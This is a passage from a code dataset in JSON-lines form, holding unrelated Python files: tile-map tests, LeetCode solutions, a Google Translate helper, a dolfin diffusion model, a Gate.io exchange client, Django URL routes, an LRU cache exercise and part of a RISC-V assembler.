100\n assert island.percent_island == 1 * 100\n\n\ndef test_Island_description():\n biom = Biom('pustynia', [(1, 2)], None, [12, 12, 12])\n island = Island(2, [(20, 10), (21, 10)], 1, 0.2, 1)\n island.bioms.append(biom)\n\n text = ''\n text += f'{\"This is the biggest island on map\"}\\n'\n text += f'{\"Surface of an island is 2 tile/s\"}\\n'\n text += f'{\"The island fills 20.00% of whole map\"}'\n text += f'{\" and 100.00% of all islands\"}\\n'\n text += f'There is a biom \"pustynia\" on the island\\n'\n text += f'{\"Surface of the biom is 1 tile/s\"}\\n'\n text += f'{\"The biom takes 50.00% of the island\"}\\n'\n assert text == island.description()\n\n\ndef test_Island_str():\n island = Island(2, [(20, 10), (21, 10)], 1, 0.2, 1)\n assert str(island) == f'{\"Island No. 1\"}'\n\n\ndef test_Biom_create():\n island = Island(2, [(20, 10), (21, 10)], 1, 0.2, 1)\n biom = Biom('pustynia', [(1, 2)], island, [234, 12, 45])\n assert biom.name == 'pustynia'\n assert biom.area == [(1, 2)]\n assert biom.island == island\n assert biom.c_code == [234, 12, 45]\n\n# ERRORS TESTING\n\n\ndef test_create_map_negative_dimentions():\n with pytest.raises(InvalidMapDimensionsError):\n TileMap(-20, 30, 20)\n\n\ndef test_create_map_negative_density_percent():\n with pytest.raises(InvalidPercentError):\n TileMap(20, 30, -20)\n\n\ndef test_add_biom_pattern_not_str_name():\n mapa = TileMap(20, 30, 20)\n with pytest.raises(InvalidBiomPatternNameError):\n mapa.add_biom_pattern(3, [233, 23, 24])\n\n\ndef test_add_biom_pattern_rbg_colour_code_negative():\n mapa = TileMap(20, 30, 20)\n with pytest.raises(InvalidRgbError):\n mapa.add_biom_pattern('a', [12, -22, 10])\n\n\ndef test_add_biom_pattern_rbg_colour_code_not_list():\n mapa = TileMap(20, 30, 20)\n with pytest.raises(InvalidRgbError):\n mapa.add_biom_pattern('a', (10, 22, 33))\n\n\ndef test_add_biom_pattern_rbg_colour_code_Invalid_component_number():\n mapa = TileMap(20, 30, 20)\n with pytest.raises(InvalidRgbError):\n mapa.add_biom_pattern('a', [12, 10])\n\n\ndef test_create_island_negative_surface():\n with pytest.raises(InvalidIslandSurfaceError):\n Island(-2, [(20, 10), (21, 10)], 1, 0.2, 1)\n\n\ndef test_create_island_surface_not_int():\n with pytest.raises(InvalidIslandSurfaceError):\n Island([20], [(20, 10), (21, 10)], 1, 0.2, 1)\n\n\ndef test_create_island_empty_area():\n with pytest.raises(InvalidIslandAreaError):\n Island(2, [], 1, 0.2, 1)\n\n\ndef test_create_island_area_not_list():\n with pytest.raises(InvalidIslandAreaError):\n Island(2, (20, 32), 1, 0.2, 1)\n\n\ndef test_create_biom_name_not_str():\n with pytest.raises(InvalidBiomNameError):\n Biom(1, [(1, 2)], None, [234, 12, 45])\n\n\ndef test_create_biom_area_not_list():\n with pytest.raises(InvalidBiomAreaError):\n Biom('a', (23, 24), None, [234, 12, 45])\n\n\ndef test_create_biom_area_empty_list():\n with pytest.raises(InvalidBiomAreaError):\n Biom('a', [], None, [234, 12, 45])\n\n\ndef test_create_biom_c_code_negative():\n with pytest.raises(InvalidRgbError):\n Biom('a', [23, 24], None, [-234, 12, 45])\n\n\ndef test_create_biom_c_code_not_list():\n with pytest.raises(InvalidRgbError):\n Biom('a', [23, 24], None, (-234, 12, 45))\n\n\ndef test_create_biom_c_code_list_invalid_components_number():\n with pytest.raises(InvalidRgbError):\n Biom('a', [23, 24], None, [12, 45])\n","repo_name":"WroblewskiAdam/TileMap-Generator","sub_path":"test_tilemap_generator.py","file_name":"test_tilemap_generator.py","file_ext":"py","file_size_in_byte":12544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"14628580240","text":"class Solution(object):\n def lengthOfLIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n dp = [1] * len(nums)\n for cur, val in enumerate(nums):\n for i in range(cur):\n if val > nums[i]:\n dp[cur] = max(dp[i] + 1, dp[cur])\n return max(dp)\n","repo_name":"peinanteng/leetcode","sub_path":"longestIncreasingSubsequence.py","file_name":"longestIncreasingSubsequence.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22787433712","text":"\"\"\"\r\ntranslate.py\r\n\r\nTranslates strings using Google Translate\r\n\r\nAll input and output is in unicode.\r\n\"\"\"\r\n\r\n__all__ = ('source_languages', 'target_languages', 'translate')\r\n\r\nimport sys\r\nimport urllib,logging\r\nfrom google.appengine.api import urlfetch\r\nfrom BeautifulSoup import BeautifulSoup\r\nfrom django.utils import simplejson as json\r\nbase_uri = \"http://ajax.googleapis.com/ajax/services/language/translate\"\r\n\r\ndefault_params = {'v': '1.0'}\r\n\r\ndef translate_ajax(sl, tl, phrase):\r\n assert type(phrase) == type(u''), \"Expects input to be unicode.\"\r\n args = default_params.copy()\r\n args.update({\r\n 'langpair': '%s%%7C%s' % (sl, tl),\r\n 'q': urllib.quote_plus(phrase.encode('utf-8')),\r\n })\r\n argstring = '%s' % ('&'.join(['%s=%s' % (k,v) for (k,v)in args.iteritems()]))\r\n url = base_uri + '?'+ argstring\r\n try:\r\n response=urlfetch.fetch(url)\r\n if response.status_code==200:\r\n resp = json.loads(response.content)\r\n# logging.info(resp)\r\n if resp['responseStatus']==200 and resp['responseData']['translatedText'] is not u'':\r\n return resp['responseData']['translatedText']\r\n else:\r\n return None\r\n else:\r\n return None\r\n except:\r\n return None\r\n\r\n\r\n\r\ndef translate(sl, tl, text):\r\n\r\n assert type(text) == type(u''), \"Expects input to be unicode.\"\r\n\r\n # Do a POST to google\r\n\r\n # I suspect \"ie\" to be Input Encoding.\r\n # I have no idea what \"hl\" is.\r\n\r\n translated_page = urlfetch.fetch(\r\n url=\"http://translate.google.com/translate_t?\" + urllib.urlencode({'sl': sl, 'tl': tl}),\r\n payload=urllib.urlencode({'hl': 'en',\r\n 'ie': 'UTF8',\r\n 'text': text.encode('utf-8'),\r\n 'sl': sl,\r\n 'tl': tl}),\r\n method=urlfetch.POST,\r\n headers={'Content-Type': 'application/x-www-form-urlencoded'}\r\n )\r\n\r\n if translated_page.status_code == 200:\r\n translated_soup = BeautifulSoup(translated_page.content)\r\n return translated_soup('div', id='result_box')[0].string\r\n else:\r\n return \"\"\r\n","repo_name":"Homoni/pyideas","sub_path":"geotwitter/utility/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73544166701","text":"import dolfin as df\nfrom .model_base import ModelBase\n\n\nclass Model(ModelBase):\n \"\"\" Problem with input zone in the middle. \"\"\"\n\n def __init__(self, mesh, L, t_PDE, j_in_const, stim_start, stim_end):\n ModelBase.__init__(self, mesh, L, t_PDE)\n self.stim_start = stim_start # time of input onset (s)\n self.stim_end = stim_end # time of input being turned off (s)\n self.j_in_const = j_in_const # constant input in input zone (mol/(m^2s))\n\n def j_in(self, t):\n \"\"\" Constant input. \"\"\"\n\n L_in = 0.1*self.L # length of input zone (m)\n L1 = self.L/2-L_in/2\n L2 = self.L/2+L_in/2\n\n j = df.Expression('j_in*(x[0] > L1)*(x[0] < L2)*(t >= tS)*(t <= tE)',\n L1=L1, L2=L2, j_in=self.j_in_const, t=t,\n tS=self.stim_start, tE=self.stim_end, degree=1)\n\n return j\n\n def j_dec(self, K_e):\n \"\"\" Decay flux proportional to [K]_e. \"\"\"\n\n k_dec = df.Constant(2.9e-8) # decay factor for [K]_e (m/s)\n\n j = - k_dec*(K_e - float(self.K_e_init))\n\n return j\n\n def set_input_fluxes(self, w):\n \"\"\" Set input fluxes. \"\"\"\n\n # split unknowns\n Na_i, Na_e, K_i, K_e, Cl_i, Cl_e, \\\n phi_i, phi_e, c = df.split(w)\n\n # input/output\n j_in = self.j_in(self.t_PDE)\n j_dec = self.j_dec(K_e)\n\n # total input/output fluxes\n j_in_K = j_in + j_dec\n j_in_Na = - j_in - j_dec\n j_in_Cl = df.Constant(0)\n\n j_in_k = [j_in_Na, j_in_K, j_in_Cl]\n\n # set the input fluxes\n self.input_fluxes = j_in_k\n\n return\n","repo_name":"hittheant/Simula_Summer_Project_1","sub_path":"src/ffian/zero_flow_model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"28010654961","text":"import requests\nimport json\nimport shutil\nimport re\nfrom pathlib import Path\n\ndef get_cardCode(cardCode, printings):\n return filter(lambda code: code.startswith(cardCode), printings)\n\ndef write_img(collection, cardCode):\n imageResp = requests.get(\"https://fabdb2.imgix.net/cards/printings/\"+ cardCode +\".png\")\n imageResp.raw.decode_content = True\n if (\"-CF\" in cardCode):\n cardCode = cardCode.replace(\"-CF\", \"\")\n elif (\"-RF\" in cardCode):\n cardCode = cardCode.replace(\"-RF\", \"\")\n image = open(\"images/\"+ collection +\"/\"+ cardCode +\".png\", \"wb\")\n image.write(imageResp.content)\n image.close()\n print(imageResp.status_code, \"Saved\", cardCode)\n\ndef build_releases(collection, dataset, limited=False):\n Path(\"images/\"+collection).mkdir(parents=True, exist_ok=True)\n if limited:\n Path(\"images/u-\"+collection).mkdir(parents=True, exist_ok=True)\n\n for card in dataset:\n result = get_cardCode(card[\"cardCode\"], card[\"printings\"])\n write_img(collection, list(result)[0])\n if limited:\n result = get_cardCode(\"U-\"+card[\"cardCode\"], card[\"printings\"])\n write_img(\"u-\"+collection, list(result)[0])\n\ndef main():\n datasets = [\"cards/wtr.json\", \"cards/arc.json\", \"cards/mon.json\", \"cards/cru.json\"]\n limited = [True, True, True, False] # set to true if you want to download 1st edition\n\n for fname in datasets:\n jfile = open(fname, \"r\")\n collection = fname.split(\"/\")[1].replace(\".json\", \"\")\n build_releases(collection, json.loads(jfile.read()), limited[datasets.index(fname)])\n jfile.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"aCard0s0/FabScripts","sub_path":"build_imgs.py","file_name":"build_imgs.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"20657486162","text":"import time\n\nfrom selenium import webdriver\n\nfrom selenium.webdriver.common.by import By\n\ndriver = webdriver.Edge(executable_path=r'C:\\Users\\User\\Desktop\\msedge.exe')\ndriver.implicitly_wait(5)\ndriver.get(\"https://the-internet.herokuapp.com/iframe\")\ndriver.switch_to.frame(\"mce_0_ifr\")\ndriver.find_element(By.CSS_SELECTOR,\"#tinymce\").clear()\n\ndriver.find_element(By.CSS_SELECTOR,\"#tinymce\").send_keys(\"I am able to automate frames\")\ndriver.switch_to.default_content()\nprint(driver.find_element(By.CSS_SELECTOR,\"h3\").text)\ntime.sleep(4)\n","repo_name":"USERfrnd/Git","sub_path":"pythonProject2/frames.py","file_name":"frames.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"72769636459","text":"import copy\n\nfrom gefest.core.algs.geom.validation import out_of_bound, self_intersection, too_close, intersection, unclosed_poly, \\\n is_contain, distance_between_points\nfrom gefest.core.structure.structure import Structure\n\n\ndef check_constraints(structure: Structure, is_lightweight: bool = False, domain=None, model_func=None) -> bool:\n try:\n if any([(poly is None or\n len(poly.points) == 0 or\n any([pt is None for pt in poly.points]))\n for poly in structure.polygons]):\n print('Wrong structure - problems with points')\n return False\n\n cts = [out_of_bound(structure, domain),\n too_close(structure, domain),\n is_contain(structure, domain),\n self_intersection(structure),\n intersection(structure, domain),\n unclosed_poly(structure, domain),\n distance_between_points(structure, domain)]\n structurally_correct = not any(cts)\n\n if not structurally_correct:\n return structure\n except Exception as ex:\n print(ex)\n import traceback\n print(traceback.format_exc())\n return False\n\n return structure\n","repo_name":"SoloWayG/Test","sub_path":"gefest/core/opt/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"72812200619","text":"'''\n有字符串\"万过薪月,员序程马黑来,nohtyP学\"\n1、使用学过的任何方法,得到:\"黑马程序员\"\n提示:\n# 1、倒序字符串,切片取出,或者切片取出然后倒序\n# 2、split分隔\",\",replace替换\"来\"为空,倒序字符串\n'''\n\nstr = \"万过薪月,员序程马黑来,nohtyP学\"\n\n# num3 = len(str)\n# print(f\"字符串的长度是{num3}\")\n# ## 得到19,即正序[0, 18]或倒序[-1, -19]\n\n# 1\n\n## 先倒序再取值\nstr1 = str[::-1]\n\nindex1 = str1.index(\"黑\")\nindex2 = str1.index(\"员\")\nprint(f\"倒序黑字的下标为{index1},员的下标为{index2}\") # 得到9,13\nresult1 = str1[9:13+1]\nprint(f\"方法1:{result1}\")\n\n# 2\n\n## 先取出再倒序\nindex1 = str.index(\"员\")\nindex2 = str.index(\"黑\")\nprint(f\"正序黑字的下标为{index1},员的下标为{index2}\") # 得到5,9\nstr2 = str[5:9+1]\nresult2_1 = str2[::-1]\nprint(f\"方法2.1:{result2_1}\")\n\n## 整合写法\nresult2_2 = str[5:9+1][::-1]\nprint(f\"方法2.2:{result2_2}\")\n\n# 3\n\n## 先split分割\nstr3 = str.split(\",\")\n## 取split的中间部分\nstr3_1 = str3[1]\n## 再replace替换\nstr3_2 = str3_1.replace(\"来\", \"\")\n## 取倒序\nresult3_1 = str3_2[::-1]\nprint(f\"方法3.1:{result3_1}\")\n\n## 整合写法\nresult3_2 = str.split(\",\")[1].replace(\"来\", \"\")[::-1]\nprint(f\"方法3.2:{result3_2}\")\n\n# 总结:\n# 方法3不需要考虑下标,相对简洁,但要求对序列整体有充分把握;\n# 方法1和2的情况适合,序列很大不能完全掌握,只有模糊印象,需要下标来定位需要改动的位置","repo_name":"Waynecold/MyVSCode","sub_path":"Python/MyFirstPython/6-函数容器/6-11-序列切片的示例.py","file_name":"6-11-序列切片的示例.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"33306100285","text":"# Given an array A of integers and integer K, return the maximum S such that the\n# re exists i < j with A[i] + A[j] = S and S < K. If no i, j exist satisfying this\n# equation, return -1. \n# \n# \n# \n# Example 1: \n# \n# \n# Input: A = [34,23,1,24,75,33,54,8], K = 60\n# Output: 58\n# Explanation: \n# We can use 34 and 24 to sum 58 which is less than 60.\n# \n# \n# Example 2: \n# \n# \n# Input: A = [10,20,30], K = 15\n# Output: -1\n# Explanation: \n# In this case it's not possible to get a pair sum less that 15.\n# \n# \n# \n# \n# Note: \n# \n# \n# 1 <= A.length <= 100 \n# 1 <= A[i] <= 1000 \n# 1 <= K <= 2000 \n# \n# Related Topics Array\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution(object):\n def twoSumLessThanK(self, A, K):\n \"\"\"\n :type A: List[int]\n :type K: int\n :rtype: int\n \"\"\"\n A.sort()\n ans = -1\n n = len(A)\n for i in range(n):\n if A[i] >= K: break\n for j in range(i + 1, n):\n if A[j] >= K: break\n if A[i] + A[j] < K:\n ans = max(ans, A[i] + A[j])\n return ans\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"hdlldh/leetcode_python","sub_path":"leetcode/editor/en/[1099]Two Sum Less Than K.py","file_name":"[1099]Two Sum Less Than K.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18766558900","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\"\"\"jobboard URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url, include, patterns\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n#from home.views import IndexView\n\nurlpatterns = patterns('',\n #url(r'^', include('jobboard.home.urls', namespace=\"home\")),\n #url(r'^grappelli/', include('grappelli.urls')), \n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'home.views.myhome', name='home'),\n url(r'^contact/$', 'home.views.sendMail', name='sendMail'),\n url(r'^legal/$', 'home.views.legal', name='legal'),\n url(r'^tos/$', 'home.views.tos', name='tos'),\n url(r'^publicity/$', 'home.views.publicity', name='publicity'),\n url(r'^mobileapp/$', 'home.views.mobileapp', name='mobileapp'),\n url(r'^subscription/$', 'home.views.subscription', name='subscription'),\n url(r'^sitemap/$', 'home.views.sitemap', name='sitemap'),\n url(r'^magazine/$', 'home.views.magazine', name='magazine'),\n #url(r'^ajout/$', 'home.views.ajout', name='ajout'),\n url(r'^article/$', 'home.views.addArticle', name='addarticle'),\n url(r'^nouvo/$', 'home.views.nouvo', name='nouvo'),\n url(r'^slide/$', 'home.views.slide', name='slide'),\n url(r'^search/$', 'home.views.search_sap', name='search'),\n #url(r'^souscriptionnews/', 'home.views.addSouscripteurNews', name='news'),\n url(r'^myview/(?P[0-9]+)/$', 'home.views.myview', name='myview'),\n url(r'^categories/(?P[0-9]+)/$', 'home.views.articles', name='categories'),\n #url(r'^myview/(?P[0-9]+)/categorie=(?P[a-z]+)', 'home.views.myview', name='myview'),\n url(r'^slideview/(?P[0-9]+)/$', 'home.views.slideView', name='slide'),\n url(r'^about/$', 'jobboard.views.about', name='about'),\n #url(r'^accounts/', include('registration.backends.simple.urls')),\n url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n url(r'^filer/', include('filer.urls')),\n url(r'^ratings/', include('star_ratings.urls', namespace='ratings', app_name='ratings')),\n\n url(r'^accounts/', include('allauth.urls')),\n url(r'^chaining/', include('smart_selects.urls')),\n\n\n\n \n\n)\nhandler403 = 'jobboard.views.permission_denied_view'\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"prabu3192/sandp","sub_path":"jobboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"72020423021","text":"\"\"\"\nAuthor: thomaszdxsn\n\"\"\"\nimport asyncio\nfrom datetime import datetime\nfrom urllib.parse import urljoin\nfrom typing import Union, Callable\n\nfrom . import WebsocketSdkAbstract, RestSdkAbstract\nfrom ..schemas import Params\n\n__all__ = (\n 'GateIORest',\n)\n\n\nclass GateIORest(RestSdkAbstract):\n \"\"\"\n doc: https://gate.io/api2\n \"\"\"\n base_url = 'https://data.gateio.io'\n _ticker_url = '/api2/1/ticker/{symbol}'\n _depth_url = '/api2/1/orderBook/{symbol}'\n _trades_url = '/api2/1/tradeHistory/{symbol}'\n _kline_url = '/api2/1/candlestick2/{symbol}'\n\n def _ticker_request(self, symbol: str) -> Params:\n url = urljoin(\n self.base_url, \n self._ticker_url.format(symbol=symbol)\n )\n return Params(args=(url,))\n\n def _depth_request(self, symbol: str) -> Params:\n url = urljoin(\n self.base_url, \n self._depth_url.format(symbol=symbol)\n )\n return Params(args=(url,))\n\n def _trades_request(self, \n symbol: str,\n tid: Union[str, None]=None) -> Params:\n url = urljoin(\n self.base_url, \n self._trades_url.format(symbol=symbol)\n )\n if tid:\n url = f\"{url}/{tid}\"\n return Params(args=(url,))\n\n def _kline_request(self,\n symbol: str,\n group_sec: int=60,\n range_hour: int=1) -> Params:\n url = urljoin(\n self.base_url,\n self._kline_url.format(symbol=symbol)\n )\n request_data = {\n 'params': {\n 'group_sec': group_sec,\n 'range_hour': range_hour\n }\n }\n return Params(\n args=(url,),\n kwargs=request_data\n )\n \n\nclass GateIOWebsocket(WebsocketSdkAbstract):\n \"\"\"\n doc: https://gateio.io/docs/websocket/index.html\n \"\"\"\n _servertime_id = 100\n _alternative_ws_url = 'wss://ws.gate.io/v3/'\n ws_url = 'wss://ws.gateio.io/v3/'\n\n async def subscribe(self, *args, **kwargs):\n if not self.ws_client:\n await self.setup_ws_client()\n # subscribe server time\n server_time_chann = {\n 'id': self._servertime_id,\n 'method': 'server.time',\n 'params': []\n }\n await self.ws_client.send_json(server_time_chann)\n await super().subscribe(*args, **kwargs)\n\n async def connect(self, handler: Callable):\n # 这个ws接口需要重复request才会返回数据\n i = 1\n chan_nums = len(self.register_hub) + 1\n async for msg in self.ws_client:\n await handler(msg)\n if i % chan_nums == 0: # TODO: 需要为每个数据类型配置不同的sleep时间\n await asyncio.sleep(1) # TODO: need configify\n i = 0\n await self.subscribe()\n i += 1\n\n def register_ticker(self, \n market: str,\n id_: int, \n period: int=86400):\n channel_info = {\n 'id': id_,\n 'method': 'ticker.query',\n 'params': [market.upper(), period]\n }\n self.register_channel(channel_info)\n\n def register_depth(self,\n market: str,\n id_: int,\n limit: int=20,\n interval: str='0.000000000001'):\n channel_info = {\n 'id': id_,\n 'method': 'depth.query',\n 'params': [market.upper(), limit, interval]\n }\n self.register_channel(channel_info)\n\n def register_trades(self,\n market: str,\n id_: int,\n last_id: int=0,\n limit: int=20):\n channel_info = {\n 'id': id_,\n 'method': 'trades.query',\n 'params': [market.upper(), limit, last_id]\n }\n self.register_channel(channel_info)\n\n def register_kline(self,\n market: str,\n id_: int,\n start: int=1,\n end: Union[int, None]=None,\n interval=60):\n if end is None:\n end = int(datetime.now().timestamp())\n channel_info = {\n 'id': id_,\n 'method': 'kline.query',\n 'params': [market.upper(), start, end, interval]\n }\n self.register_channel(channel_info)","repo_name":"thomaszdxsn/MarketKing","sub_path":"src/sdk/gateio.py","file_name":"gateio.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"92"} +{"seq_id":"5876318235","text":"import re\n\n\ndef solution(user_id, banned_id):\n banned_pattern = list(map(lambda x: \"^\" + x.replace(\"*\", \".\") + \"$\", banned_id))\n banned_set = set()\n visited = [0] * len(user_id)\n\n\n def f(n):\n if n == len(banned_id):\n banned_set.add(tuple(visited))\n return\n for i in range(len(user_id)):\n if visited[i] == 0 and re.match(banned_pattern[n], user_id[i]):\n visited[i] = 1\n f(n+1)\n visited[i] = 0\n\n\n f(0)\n answer = len(banned_set)\n return answer","repo_name":"kiung22/algorithm-problem-solving","sub_path":"Programmers/level3/불량사용자.py","file_name":"불량사용자.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"197870884","text":"\"\"\"\nhttps://www.hackerrank.com/contests/justcode/challenges/lru-implementtion\n\nGiven:\nN: no of elements\nS: max. capacity of cache\na[i]: N no. of integers\n\nOutput:\nPF: No. of page faults.\nState of LRU cache.\n\nPage falut occures when the element is not found in the cache.\nIn LRU algo , the least recently elements is removed first when no free space is avalaible in cache.\n\nInput Format\n\nN: no of elements\nS: max. capacity of cache\na[i]: N no. of integers\nConstraints\n\nN ,S & a[i] all are integers\n\nOutput Format\nPF:page fault\nelements in LRU cache.\n\nSample Input\n10 4\n1 2 3 2 5 3 4 5 8 9\nSample Output\n7\n9 8 5 4\nExplanation\nInitially cache will be empty.\n1 _ _ _ 1\n2 1 _ _ 2\n3 2 1 _ 3\n2 3 1 _ 3\n5 2 3 1 4\n3 5 2 1 4\n4 3 5 2 5\n5 4 3 2 5\n8 5 4 3 6\n9 8 5 4 7\ntherefore: pagefaults = 7. state : 9 8 5 4.\n\n\"\"\"\n\nfrom collections import OrderedDict\n\n\nclass LRU():\n def __init__(self, S:int) -> None:\n self.capacity = S\n self._cache = OrderedDict() # {value:}\n\n def process(self, N:int, data:list[int]) -> tuple[int,list[int]]:\n if N != len(data):\n raise ValueError(f\"size of input data doesn't match {N}\")\n pf = 0 # page-fault\n for d in data:\n if not self.cache(d):\n pf += 1\n state = [d for d in self._cache]\n state.reverse()\n return (pf, state)\n\n def cache(self, data:int) -> bool:\n if data in self._cache: # hit\n self._cache.move_to_end(data, last=True)\n return True\n if len(self._cache) < self.capacity:\n self._cache[data] = True # key=data, the value doesn't matter\n else:\n self._cache.popitem(last=False)\n self._cache[data] = True\n return False\n \n\ndef test():\n data = [\n ((10, 4, [1, 2, 3, 2, 5, 3, 4, 5, 8, 9]), (7,[9, 8, 5, 4])),\n ]\n result = \"\"\n for (N, S, d), (pf,state) in data:\n s = LRU(S)\n r1, r2 = s.process(N, d)\n if r1 != pf or r2 != state:\n result = \"FAIL\"\n else:\n result = \"PASS\"\n print(f\"{result}, ({r1},{r2}), exp ({pf},{state})\")\n\n\ntest()\n\n\n","repo_name":"icoding2016/study","sub_path":"PY/hackrank/LRU_implementation.py","file_name":"LRU_implementation.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"36856144301","text":"for _ in range(int(input())):\n n, m = map(int, input().split())\n placed = {}\n floating = {}\n a, b, d = map(int, input().split())\n placed[b] = 0\n placed[a] = d\n for i in range(m-1):\n a, b, d = map(int, input().split())\n if b not in placed and a not in placed:\n floating[a] = (b, d)\n floating[b] = (a, d)\n elif b in placed:\n if a in placed:\n if placed[a]-placed[b] != d: break\n elif a in floating:\n placed[a] = placed[b] + d\n placed[floating[a][0]] = placed[a] - placed[floating[a][1]]\n floating.pop(a)\n floating.pop(b)\n else:\n placed[a] = placed[b] + d\n elif a in placed:\n if b in floating:\n placed[b] = placed[a] - d\n placed[floating[b][0]] = placed[b] - placed[floating[b][1]]\n floating.pop(a)\n floating.pop(b)\n else:\n placed[b] = placed[a] - d\n else:\n print(\"YES\")\n continue\n print(\"NO\")","repo_name":"JaydenPahukula/competitive-coding","sub_path":"Codeforces/886/H.py","file_name":"H.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"74117422058","text":"#!/usr/bin/env python3\nimport sys\nimport struct\nimport string\nimport re\nfrom .instructions import instruction_specs\nfrom .encode import encoder\nfrom .constant import CONDITIONAL_JUMP_INSTRS\nfrom .syntax_sugars import syntax_sugar_specs\n\n# utilities for general\ndef exit_with_error(fmt):\n print(fmt)\n exit(1)\n\ndef is_num(s):\n return re.match(r'^(-)?(0x)?[0-9A-Fa-f][0-9A-Fa-f]*$', s) is not None\n\n# utilities for label controll\ndef get_raw_label(label):\n label_inside = re.match(r\"^\\%lo\\((.*)\\)$\", label)\n if label_inside is not None:\n return label_inside.groups()[0]\n else:\n return label\n \ndef label_to_imm(labels, label, current_offset):\n label_inside = re.match(r\"^\\%lo\\((.*)\\)$\", label)\n if label_inside is not None:\n label = label_inside.groups()[0]\n return labels[label] * 4\n else:\n return (labels[label] - current_offset) * 4\n \ndef replace_label_by(args, imm):\n return args[:-1] + [imm]\n\ndef get_label_in_args(spec, args):\n if(spec[\"type\"] in [\"b\", \"i\", \"s\"] \\\n and len(args) == 3 \\\n and not is_num(args[2])):\n return args[2]\n elif (spec[\"type\"] in [\"j\", \"u\"] \\\n and len(args) == 2 \\\n and not is_num(args[1])):\n return args[1]\n elif ('arg_num' in spec \\\n and len(args) == spec['arg_num'] \\\n and not is_num(args[len(args)-1])):\n return args[len(args)-1] \n else:\n return None\n\ndef has_label(x):\n return x[3] is not None\n\ndef is_label_valid(x, labels):\n return has_label(x) and get_raw_label(x[3]) in labels\n\n# utilities for instruction controll\ndef is_instr(instr_name):\n return instr_name in instruction_specs\n\ndef is_syntax_sugar(instr_name):\n return instr_name in syntax_sugar_specs\n\ndef get_spec(instr_name):\n if is_instr(instr_name):\n return instruction_specs[instr_name]\n elif is_syntax_sugar(instr_name):\n return syntax_sugar_specs[instr_name]\n else:\n return None\n\n# utilities for encoding \ndef encode_by_spec(spec, args, line_num, options):\n try:\n if \"encoder\" in spec:\n return (spec[\"encoder\"])(spec, args, options)\n elif \"type\" in spec:\n return (encoder[spec[\"type\"]])(spec, args, options)\n else:\n return None\n except OverflowError:\n exit_with_error(\"[-] overflow occcuerd at {}\".format(line_num))\n except IndexError:\n exit_with_error(\"[-] invalid arguments for {} at {}\".format(instr_name,\n line_num))\n \ndef quick_encode(lines):\n parsed_instructions = []\n labels = {}\n instructions = []\n \n for line_num, raw_l in map(lambda x: (x[0]+1, x[1]), enumerate(lines)):\n # pre-processing\n stripped_line = raw_l.strip().split(';')[0].strip()\n if stripped_line == '':\n continue \n components = list(map(lambda y: y.strip(), stripped_line.split()))\n\n # if the line describes ...\n if components[0].endswith(':'):\n # labels\n label = components[0] [:-1]\n offset = len(instructions)\n if label in labels:\n exit_with_error(\"[-] label name duplicated: {}\".format(label))\n labels[label] = offset \n else:\n # instructions \n instr_name = components[0]\n args = list(map(lambda x: x.strip(), ' '.join(components[1:]).split(',')))\n spec = get_spec(instr_name)\n if spec is None:\n exit_with_error(\"[-] instruction not found at {}: {}\".format(line_num,\n instr_name))\n target_label = get_label_in_args(spec, args)\n parsed_instruction = [instr_name,\n args,\n len(instructions),\n target_label,\n line_num,\n 1]\n imm_patches = [0] if has_label(parsed_instruction) else asm_instruction(parsed_instruction)\n parsed_instruction[5] = len(imm_patches)\n \n 